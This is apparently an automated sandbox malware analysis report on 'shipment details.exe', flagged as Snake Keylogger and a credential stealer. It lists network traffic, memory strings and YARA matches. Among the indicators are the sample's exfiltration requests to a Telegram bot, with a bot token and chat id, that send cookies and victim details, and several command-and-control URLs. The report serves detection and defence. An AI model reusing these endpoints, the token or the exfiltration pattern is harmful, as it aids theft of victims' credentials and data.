Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 16:21:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 62359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\shipment details.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\shipment details.exe	Code function: 0_2_00CFE5A4	0_2_00CFE5A4
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 0_2_00CFF498	0_2_00CFF498
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 0_2_05E08BC0	0_2_05E08BC0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_01337118	1_2_01337118
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133C147	1_2_0133C147
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133A088	1_2_0133A088
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_01335362	1_2_01335362
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133D278	1_2_0133D278
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133C468	1_2_0133C468
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133C738	1_2_0133C738
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_013369A0	1_2_013369A0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133E988	1_2_0133E988
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133CA08	1_2_0133CA08
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133CCD8	1_2_0133CCD8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133CFAA	1_2_0133CFAA
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133E97A	1_2_0133E97A
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_0133F960	1_2_0133F960
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_013339EE	1_2_013339EE
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_013329EC	1_2_013329EC
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_01333AA1	1_2_01333AA1
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_01333E09	1_2_01333E09
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD1E80	1_2_06BD1E80
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD17A0	1_2_06BD17A0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD9C70	1_2_06BD9C70
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDFC68	1_2_06BDFC68
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD9548	1_2_06BD9548
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD0B30	1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD5028	1_2_06BD5028
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD2968	1_2_06BD2968
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDE6B0	1_2_06BDE6B0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDE6AF	1_2_06BDE6AF
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDDE00	1_2_06BDDE00
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD1E70	1_2_06BD1E70
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD178F	1_2_06BD178F
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDEF60	1_2_06BDEF60
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDEF51	1_2_06BDEF51
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDCCA0	1_2_06BDCCA0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDCC8F	1_2_06BDCC8F
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDDDFF	1_2_06BDDDFF
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD550	1_2_06BDD550
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD540	1_2_06BDD540
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDEAF8	1_2_06BDEAF8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDE258	1_2_06BDE258
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDE24A	1_2_06BDE24A
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDF3B8	1_2_06BDF3B8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD8BA0	1_2_06BD8BA0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD8B91	1_2_06BD8B91
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD9BFB	1_2_06BD9BFB
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD9328	1_2_06BD9328
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD0B20	1_2_06BD0B20
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDEB08	1_2_06BDEB08
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD0F8	1_2_06BDD0F8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD0E8	1_2_06BDD0E8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD5018	1_2_06BD5018
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDF810	1_2_06BDF810
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD0006	1_2_06BD0006
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDF802	1_2_06BDF802
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD0040	1_2_06BD0040
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD9A8	1_2_06BDD9A8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BDD999	1_2_06BDD999
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 1_2_06BD295A	1_2_06BD295A

Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
Source: shipment details.exe, 00000000.00000000.2051525359.000000000079A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4519226318.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs shipment details.exe
Source: shipment details.exe, 00000001.00000002.4518256105.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000001.00000002.4518425391.0000000000DC7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipment details.exe
Source: shipment details.exe	Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe

Source: shipment details.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

